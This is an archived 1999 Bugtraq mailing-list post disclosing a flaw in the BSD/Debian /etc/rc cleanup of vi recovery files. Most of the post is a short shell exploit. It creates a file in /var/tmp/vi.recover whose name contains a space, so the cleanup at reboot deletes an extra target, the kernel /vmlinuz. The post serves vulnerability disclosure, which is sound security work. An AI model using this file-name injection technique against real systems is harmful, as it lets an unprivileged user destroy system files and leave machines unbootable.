[13172] in bugtraq

home help back first fref pref prev next nref lref last post

vibackup.sh

daemon@ATHENA.MIT.EDU (Loneguard)
Fri Dec 31 13:37:48 1999

Message-Id:  <19991231143208.94AD11F5E8@lists.securityfocus.com>
Date:         Fri, 31 Dec 1999 06:32:08 -0800
Reply-To: Loneguard <loneguard@CRAZYMONKEY.ORG>
From: Loneguard <loneguard@CRAZYMONKEY.ORG>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Looks like someone noticed this at some point in OpenBSD. Its broken
rather than fixed ;(

#!/bin/sh
#
# vibackup.sh - Loneguard 22/05/99
# Open/FreeBSD/Debian /etc/rc script insecurely removes old vi files allowing deletion
# of files
#
touch '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
chmod 700 '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
echo Now wait for ( or cause ) a reboot...

home help back first fref pref prev next nref lref last post